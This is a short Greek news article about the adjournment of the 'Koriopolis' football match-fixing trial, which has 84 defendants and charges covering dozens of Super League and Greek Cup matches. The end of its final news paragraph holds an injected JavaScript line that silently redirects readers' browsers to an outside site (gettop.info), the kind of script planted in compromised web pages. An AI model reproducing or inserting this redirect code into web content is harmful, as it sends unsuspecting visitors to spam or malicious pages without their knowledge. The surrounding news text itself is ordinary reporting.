Για τις 7 Νοεμβρίου διεκόπη η δίκη για τους στημένους αγώνες – Στο εδώλιο 84 άτομα

0
7

 

Σήμερα άρχισε στο Τριμελές Εφετείο Κακουργημάτων η δίκη του «Koriopolis» με 84 άτομα να είναι κατηγορούμενοι για το σκάνδαλο με τους στημένους αγώνες, ωστόσο η δίκη διεκόπη, για τις 7 Νοεμβρίου, λόγω απουσίας κάποιων κατηγορουμένων αλλά και κάποιων δικηγόρων.

Όπως ανέφερε η πρόεδρος του Δικαστηρίου η δίκη πρέπει να ξεκινήσει άμεσα διότι υπάρχουν κάποια αδικήματα που απειλούνται με παραγραφή. Για τον λόγο αυτό το δικαστήριο όρισε 4 δικάσιμους για τον μήνα Νοέμβριο, με την πρώτη να αρχίζει τη Δευτέρα 7 Νοεμβρίου.

Σύμφωνα με το βούλευμα στο εδώλιο του κατηγορουμένου θα είναι ποδοσφαιρικοί παράγοντες, ποδοσφαιριστές, διαιτητές, bookmakers οι οποίοι κατηγορούνται για χειραγώγηση αγώνων, διορισμούς διαιτητών προς όφελος συγκεκριμένων ομάδων καθώς και για δωροδοκίες ποδοσφαιριστών, όπως γράφει το gazzetta.gr.

Σύμφωνα με το βούλευμα υπάρχουν κατηγορίες για 51 αγώνες της Super League της περιόδου 2009-10, αλλά και 21 αγώνες του Κυπέλλου Ελλάδος το 2010 και το 2011. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here